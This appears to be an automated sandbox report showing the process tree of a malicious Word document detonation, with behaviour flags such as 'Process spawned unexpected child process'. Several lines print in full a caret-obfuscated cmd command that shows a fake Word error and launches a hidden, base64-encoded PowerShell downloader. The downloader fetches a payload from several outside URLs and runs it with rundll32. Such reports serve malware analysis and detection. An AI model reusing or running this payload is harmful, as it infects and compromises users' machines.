                                                                                                                        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\L4VEFCDESA5DE6B.doc" /o ""
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:1084
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA
                                                                                                                          1⤵
                                                                                                                          • Process spawned unexpected child process
                                                                                                                          PID:4084
                                                                                                                          • C:\Windows\system32\msg.exe
                                                                                                                            msg Admin /v Word experienced an error trying to open the file.
                                                                                                                            2⤵
                                                                                                                              PID:1120
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -w hidden -enc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3132
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA
                                                                                                                            1⤵
                                                                                                                            • Process spawned unexpected child process
                                                                                                                            PID:2088
                                                                                                                            • C:\Windows\system32\msg.exe
                                                                                                                              msg Admin /v Word experienced an error trying to open the file.
                                                                                                                              2⤵
                                                                                                                                PID:4048
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
